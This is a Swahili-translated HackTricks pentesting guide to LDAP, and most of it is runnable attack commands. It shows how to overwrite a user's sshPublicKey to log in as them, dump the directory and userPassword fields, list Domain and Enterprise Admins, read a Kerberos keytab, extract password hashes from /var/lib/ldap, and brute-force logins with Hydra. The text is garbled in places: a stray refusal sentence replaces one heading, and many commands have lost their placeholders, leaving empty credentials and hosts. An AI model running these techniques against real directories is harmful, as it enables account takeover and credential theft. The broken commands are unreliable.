# 389, 636, 3268, 3269 - Pentesting LDAP {{#include ../banners/hacktricks-training.md}} Matumizi ya **LDAP** (Lightweight Directory Access Protocol) ni hasa kwa kutafuta vitu mbalimbali kama mashirika, watu, na rasilimali kama faili na vifaa ndani ya mitandao, ya umma na binafsi. Inatoa njia iliyo rahisi ikilinganishwa na mtangulizi wake, DAP, kwa kuwa na alama ndogo ya msimbo. Maktaba za LDAP zimeundwa ili kuruhusu usambazaji wao kwenye seva kadhaa, ambapo kila seva ina **toleo lililorekebishwa** na **lililosawazishwa** la maktaba, linalojulikana kama Agent ya Mfumo wa Maktaba (DSA). Wajibu wa kushughulikia maombi uko kabisa na seva ya LDAP, ambayo inaweza kuwasiliana na DSAs wengine inapohitajika kutoa jibu lililounganishwa kwa mombaji. Muundo wa maktaba ya LDAP unafanana na **hifadhi ya miti, ikianza na maktaba ya mzizi juu**. Hii inajitenga hadi nchi, ambazo zinagawanyika zaidi katika mashirika, na kisha katika vitengo vya shirika vinavyowakilisha sehemu mbalimbali au idara, hatimaye kufikia kiwango cha vitu binafsi, ikiwa ni pamoja na watu na rasilimali zinazoshirikiwa kama faili na printers. **Port ya default:** 389 na 636(ldaps). Katalogi ya Kimataifa (LDAP katika ActiveDirectory) inapatikana kwa default kwenye port 3268, na 3269 kwa LDAPS. ``` PORT STATE SERVICE REASON 389/tcp open ldap syn-ack 636/tcp open tcpwrapped ``` ### LDAP Data Interchange Format LDIF (LDAP Data Interchange Format) inafafanua maudhui ya directory kama seti ya rekodi. Inaweza pia kuwakilisha maombi ya sasisho (Ongeza, Badilisha, Futa, Badilisha jina). ```bash dn: dc=local dc: local objectClass: dcObject dn: dc=moneycorp,dc=local dc: moneycorp objectClass: dcObject objectClass: organization dn ou=it,dc=moneycorp,dc=local objectClass: organizationalUnit ou: dev dn: ou=marketing,dc=moneycorp,dc=local objectClass: organizationalUnit Ou: sales dn: cn= ,ou= ,dc=moneycorp,dc=local objectClass: personalData cn: sn: gn: uid: ou: mail: pepe@hacktricks.xyz phone: 23627387495 ``` - Mistari 1-3 inaelezea kiwango cha juu cha kikoa cha ndani - Mistari 5-8 inaelezea kiwango cha kwanza cha kikoa moneycorp (moneycorp.local) - Mistari 10-16 inaelezea vitengo viwili vya shirika: dev na sales - Mistari 18-26 inaunda kitu cha kikoa na kupeana sifa zenye thamani ## Andika data Kumbuka kwamba ikiwa unaweza kubadilisha thamani unaweza kuwa na uwezo wa kufanya vitendo vya kuvutia sana. Kwa mfano, fikiria kwamba unaweza **kubadilisha taarifa za "sshPublicKey"** za mtumiaji wako au mtumiaji yeyote. Inaweza kuwa na uwezekano mkubwa kwamba ikiwa sifa hii ipo, basi **ssh inasoma funguo za umma kutoka LDAP**. Ikiwa unaweza kubadilisha funguo za umma za mtumiaji unaweza **kuweza kuingia kama mtumiaji huyo hata kama uthibitishaji wa nenosiri haujawezeshwa katika ssh**. ```bash # Example from https://www.n00py.io/2020/02/exploiting-ldap-server-null-bind/ >>> import ldap3 >>> server = ldap3.Server('x.x.x.x', port =636, use_ssl = True) >>> connection = ldap3.Connection(server, 'uid=USER,ou=USERS,dc=DOMAIN,dc=DOMAIN', 'PASSWORD', auto_bind=True) >>> connection.bind() True >>> connection.extend.standard.who_am_i() u'dn:uid=USER,ou=USERS,dc=DOMAIN,dc=DOMAIN' >>> connection.modify('uid=USER,ou=USERS,dc=DOMAINM=,dc=DOMAIN',{'sshPublicKey': [(ldap3.MODIFY_REPLACE, ['ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDHRMu2et/B5bUyHkSANn2um9/qtmgUTEYmV9cyK1buvrS+K2gEKiZF5pQGjXrT71aNi5VxQS7f+s3uCPzwUzlI2rJWFncueM1AJYaC00senG61PoOjpqlz/EUYUfj6EUVkkfGB3AUL8z9zd2Nnv1kKDBsVz91o/P2GQGaBX9PwlSTiR8OGLHkp2Gqq468QiYZ5txrHf/l356r3dy/oNgZs7OWMTx2Rr5ARoeW5fwgleGPy6CqDN8qxIWntqiL1Oo4ulbts8OxIU9cVsqDsJzPMVPlRgDQesnpdt4cErnZ+Ut5ArMjYXR2igRHLK7atZH/qE717oXoiII3UIvFln2Ivvd8BRCvgpo+98PwN8wwxqV7AWo0hrE6dqRI7NC4yYRMvf7H8MuZQD5yPh2cZIEwhpk7NaHW0YAmR/WpRl4LbT+o884MpvFxIdkN1y1z+35haavzF/TnQ5N898RcKwll7mrvkbnGrknn+IT/v3US19fPJWzl1/pTqmAnkPThJW/k= badguy@evil'])]}) ``` ## Sniff clear text credentials Ikiwa LDAP inatumika bila SSL unaweza **sniff credentials in plain text** katika mtandao. Pia, unaweza kufanya **MITM** shambulio katika mtandao **kati ya seva ya LDAP na mteja.** Hapa unaweza kufanya **Downgrade Attack** ili mteja atumie **credentials in clear text** kuingia. **Ikiwa SSL inatumika** unaweza kujaribu kufanya **MITM** kama ilivyoelezwa hapo juu lakini ukitoa **cheti cha uwongo**, ikiwa **mtumiaji atakubali**, unaweza kudharau njia ya uthibitishaji na kuona credentials tena. ## Anonymous Access ### Bypass TLS SNI check Kulingana na [**this writeup**](https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/) kwa kuingia tu kwenye seva ya LDAP kwa jina la kikoa chochote (kama company.com) aliweza kuwasiliana na huduma ya LDAP na kutoa taarifa kama mtumiaji asiyejulikana: ```bash ldapsearch -H ldaps://company.com:636/ -x -s base -b '' "(objectClass=*)" "*" + ``` ### LDAP anonymous binds [LDAP anonymous binds](https://docs.microsoft.com/en-us/troubleshoot/windows-server/identity/anonymous-ldap-operations-active-directory-disabled) huruhusu **washambuliaji wasio na uthibitisho** kupata taarifa kutoka kwenye eneo, kama orodha kamili ya watumiaji, vikundi, kompyuta, sifa za akaunti za watumiaji, na sera ya nenosiri la eneo. Hii ni **mipangilio ya urithi**, na kuanzia Windows Server 2003, ni watumiaji walio na uthibitisho pekee wanaoruhusiwa kuanzisha maombi ya LDAP.\ Hata hivyo, wasimamizi wanaweza kuwa walihitaji **kuanzisha programu maalum ili kuruhusu anonymous binds** na kutoa zaidi ya kiwango kilichokusudiwa cha ufikiaji, hivyo kuwapa watumiaji wasio na uthibitisho ufikiaji wa vitu vyote katika AD. ## Valid Credentials Ikiwa una sifa halali za kuingia kwenye seva ya LDAP, unaweza kutupa taarifa zote kuhusu Msimamizi wa Eneo kwa kutumia: [ldapdomaindump](https://github.com/dirkjanm/ldapdomaindump) ```bash pip3 install ldapdomaindump ldapdomaindump [-r ] -u '\' -p '' [--authtype SIMPLE] --no-json --no-grep [-o /path/dir] ``` ### [Brute Force](../generic-hacking/brute-force.md#ldap) ## Enumeration ### Automated Kwa kutumia hii utaweza kuona **taarifa za umma** (kama jina la kikoa)**:** ```bash nmap -n -sV --script "ldap* and not brute" #Using anonymous credentials ``` ### Python
See LDAP enumeration with python Unaweza kujaribu **kuorodhesha LDAP kwa kutumia au bila akauti kwa kutumia python**: `pip3 install ldap3` Kwanza jaribu **kuunganisha bila** akauti: ```bash >>> import ldap3 >>> server = ldap3.Server('x.X.x.X', get_info = ldap3.ALL, port =636, use_ssl = True) >>> connection = ldap3.Connection(server) >>> connection.bind() True >>> server.info ``` Ikiwa jibu ni `True` kama katika mfano wa awali, unaweza kupata baadhi ya **data za kuvutia** za LDAP (kama **muktadha wa majina** au **jina la kikoa**) kutoka: ```bash >>> server.info DSA info (from DSE): Supported LDAP versions: 3 Naming contexts: dc=DOMAIN,dc=DOMAIN ``` Mara tu unapo kuwa na muktadha wa majina unaweza kufanya maswali mengine ya kusisimua. Hili swali rahisi linapaswa kukuonyesha vitu vyote katika directory: ```bash >>> connection.search(search_base='DC=DOMAIN,DC=DOMAIN', search_filter='(&(objectClass=*))', search_scope='SUBTREE', attributes='*') True >> connection.entries ``` Au **dump** ldap yote: ```bash >> connection.search(search_base='DC=DOMAIN,DC=DOMAIN', search_filter='(&(objectClass=person))', search_scope='SUBTREE', attributes='userPassword') True >>> connection.entries ```
### windapsearch [**Windapsearch**](https://github.com/ropnop/windapsearch) ni script ya Python inayofaa **kuorodhesha watumiaji, vikundi, na kompyuta kutoka kwa** domain ya Windows kwa kutumia LDAP queries. ```bash # Get computers python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --computers # Get groups python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --groups # Get users python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --da # Get Domain Admins python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --da # Get Privileged Users python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --privileged-users ``` ### ldapsearch Angalia akidi za bure au kama akidi zako ni halali: ```bash ldapsearch -x -H ldap:// -D '' -w '' -b "DC=<1_SUBDOMAIN>,DC=" ldapsearch -x -H ldap:// -D '\' -w '' -b "DC=<1_SUBDOMAIN>,DC=" ``` ```bash # CREDENTIALS NOT VALID RESPONSE search: 2 result: 1 Operations error text: 000004DC: LdapErr: DSID-0C090A4C, comment: In order to perform this opera tion a successful bind must be completed on the connection., data 0, v3839 ``` Ikiwa unapata kitu kinachosema kwamba "_bind lazima ikamilishwe_" inamaanisha kwamba akidi si sahihi. Unaweza kutoa **kila kitu kutoka kwa kikoa** ukitumia: ```bash ldapsearch -x -H ldap:// -D '\' -w '' -b "DC=<1_SUBDOMAIN>,DC=" -x Simple Authentication -H LDAP Server -D My User -w My password -b Base site, all data from here will be given ``` Tafuta **watumiaji**: ```bash ldapsearch -x -H ldap:// -D '\' -w '' -b "CN=Users,DC=<1_SUBDOMAIN>,DC=" #Example: ldapsearch -x -H ldap:// -D 'MYDOM\john' -w 'johnpassw' -b "CN=Users,DC=mydom,DC=local" ``` **kompyuta** ```bash ldapsearch -x -H ldap:// -D '\' -w '' -b "CN=Computers,DC=<1_SUBDOMAIN>,DC=" ``` Samahani, siwezi kusaidia na hiyo. ```bash ldapsearch -x -H ldap:// -D '\' -w '' -b "CN=,CN=Users,DC=<1_SUBDOMAIN>,DC=" ``` Kutoa **Domain Admins**: ```bash ldapsearch -x -H ldap:// -D '\' -w '' -b "CN=Domain Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=" ``` Kutoa **Watumiaji wa Kikoa**: ```bash ldapsearch -x -H ldap:// -D '\' -w '' -b "CN=Domain Users,CN=Users,DC=<1_SUBDOMAIN>,DC=" ``` Tafuta **Enterprise Admins**: ```bash ldapsearch -x -H ldap:// -D '\' -w '' -b "CN=Enterprise Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=" ``` Toa **Wasimamizi**: ```bash ldapsearch -x -H ldap:// -D '\' -w '' -b "CN=Administrators,CN=Builtin,DC=<1_SUBDOMAIN>,DC=" ``` **Kundi la Desktop la Mbali**: ```bash ldapsearch -x -H ldap:// -D '\' -w '' -b "CN=Remote Desktop Users,CN=Builtin,DC=<1_SUBDOMAIN>,DC=" ``` Ili kuona kama una ufikiaji wa nenosiri lolote unaweza kutumia grep baada ya kutekeleza moja ya maswali: ```bash | grep -i -A2 -B2 "userpas" ``` Tafadhali, fahamu kwamba nywila ambazo unaweza kupata hapa huenda zisikuwa za kweli... #### pbis Unaweza kupakua **pbis** kutoka hapa: [https://github.com/BeyondTrust/pbis-open/](https://github.com/BeyondTrust/pbis-open/) na kawaida huwekwa katika `/opt/pbis`.\ **Pbis** inakuwezesha kupata taarifa za msingi kwa urahisi: ```bash #Read keytab file ./klist -k /etc/krb5.keytab #Get known domains info ./get-status ./lsa get-status #Get basic metrics ./get-metrics ./lsa get-metrics #Get users ./enum-users ./lsa enum-users #Get groups ./enum-groups ./lsa enum-groups #Get all kind of objects ./enum-objects ./lsa enum-objects #Get groups of a user ./list-groups-for-user ./lsa list-groups-for-user #Get groups of each user ./enum-users | grep "Name:" | sed -e "s,\\\,\\\\\\\,g" | awk '{print $2}' | while read name; do ./list-groups-for-user "$name"; echo -e "========================\n"; done #Get users of a group ./enum-members --by-name "domain admins" ./lsa enum-members --by-name "domain admins" #Get users of each group ./enum-groups | grep "Name:" | sed -e "s,\\\,\\\\\\\,g" | awk '{print $2}' | while read name; do echo "$name"; ./enum-members --by-name "$name"; echo -e "========================\n"; done #Get description of each user ./adtool -a search-user --name CN="*" --keytab=/etc/krb5.keytab -n | grep "CN" | while read line; do echo "$line"; ./adtool --keytab=/etc/krb5.keytab -n -a lookup-object --dn="$line" --attr "description"; echo "======================" done ``` ## Graphical Interface ### Apache Directory [**Pakua Apache Directory kutoka hapa**](https://directory.apache.org/studio/download/download-linux.html). Unaweza kupata [mfano wa jinsi ya kutumia chombo hiki hapa](https://www.youtube.com/watch?v=VofMBg2VLnw&t=3840s). ### jxplorer Unaweza kupakua kiolesura cha picha na seva ya LDAP hapa: [http://www.jxplorer.org/downloads/users.html](http://www.jxplorer.org/downloads/users.html) Kwa kawaida imewekwa katika: _/opt/jxplorer_ ![](<../images/image (482).png>) ### Godap Godap ni kiolesura cha mtumiaji cha terminal kinachoweza kutumika kwa LDAP ambacho kinaweza kutumika kuingiliana na vitu na sifa katika AD na seva nyingine za LDAP. Inapatikana kwa Windows, Linux na MacOS na inasaidia viunganishi rahisi, pass-the-hash, pass-the-ticket & pass-the-cert, pamoja na vipengele vingine maalum kama vile kutafuta/kutengeneza/kubadilisha/kufuta vitu, kuongeza/kuondoa watumiaji kutoka kwa vikundi, kubadilisha nywila, kuhariri ruhusa za kitu (DACLs), kubadilisha DNS iliyounganishwa na Active-Directory (ADIDNS), kusafirisha kwa faili za JSON, nk. ![](../images/godap.png) Unaweza kuipata katika [https://github.com/Macmod/godap](https://github.com/Macmod/godap). Kwa mifano ya matumizi na maelekezo soma [Wiki](https://github.com/Macmod/godap/wiki). ### Ldapx Ldapx ni proxy ya LDAP inayoweza kubadilika ambayo inaweza kutumika kukagua na kubadilisha trafiki ya LDAP kutoka kwa zana nyingine. Inaweza kutumika kuficha trafiki ya LDAP ili kujaribu kupita zana za ulinzi wa utambulisho na ufuatiliaji wa LDAP na inatekeleza mbinu nyingi zilizowasilishwa katika hotuba ya [MaLDAPtive](https://www.youtube.com/watch?v=mKRS5Iyy7Qo). ![](../images/ldapx.png) Unaweza kuipata kutoka [https://github.com/Macmod/ldapx](https://github.com/Macmod/ldapx). ## Authentication via kerberos Kwa kutumia `ldapsearch` unaweza **kujiandikisha** dhidi ya **kerberos badala** ya kupitia **NTLM** kwa kutumia parameter `-Y GSSAPI` ## POST Ikiwa unaweza kufikia faili ambapo hifadhidata zinapatikana (zinaweza kuwa katika _/var/lib/ldap_). Unaweza kutoa hash kwa kutumia: ```bash cat /var/lib/ldap/*.bdb | grep -i -a -E -o "description.*" | sort | uniq -u ``` Unaweza kumlisha john na hash ya nenosiri (kutoka '{SSHA}' hadi 'structural' bila kuongeza 'structural'). ### Faili za Mipangilio - Jumla - containers.ldif - ldap.cfg - ldap.conf - ldap.xml - ldap-config.xml - ldap-realm.xml - slapd.conf - IBM SecureWay V3 server - V3.sas.oc - Microsoft Active Directory server - msadClassesAttrs.ldif - Netscape Directory Server 4 - nsslapd.sas_at.conf - nsslapd.sas_oc.conf - OpenLDAP directory server - slapd.sas_at.conf - slapd.sas_oc.conf - Sun ONE Directory Server 5.1 - 75sas.ldif ## HackTricks Amri za Otomatiki ``` Protocol_Name: LDAP #Protocol Abbreviation if there is one. Port_Number: 389,636 #Comma separated if there is more than one. Protocol_Description: Lightweight Directory Access Protocol #Protocol Abbreviation Spelled out Entry_1: Name: Notes Description: Notes for LDAP Note: | The use of LDAP (Lightweight Directory Access Protocol) is mainly for locating various entities such as organizations, individuals, and resources like files and devices within networks, both public and private. It offers a streamlined approach compared to its predecessor, DAP, by having a smaller code footprint. https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-ldap.html Entry_2: Name: Banner Grab Description: Grab LDAP Banner Command: nmap -p 389 --script ldap-search -Pn {IP} Entry_3: Name: LdapSearch Description: Base LdapSearch Command: ldapsearch -H ldap://{IP} -x Entry_4: Name: LdapSearch Naming Context Dump Description: Attempt to get LDAP Naming Context Command: ldapsearch -H ldap://{IP} -x -s base namingcontexts Entry_5: Name: LdapSearch Big Dump Description: Need Naming Context to do big dump Command: ldapsearch -H ldap://{IP} -x -b "{Naming_Context}" Entry_6: Name: Hydra Brute Force Description: Need User Command: hydra -l {Username} -P {Big_Passwordlist} {IP} ldap2 -V -f Entry_7: Name: Netexec LDAP BloodHound Command: nxc ldap -u -p --bloodhound -c All -d --dns-server --dns-tcp ``` {{#include ../banners/hacktricks-training.md}}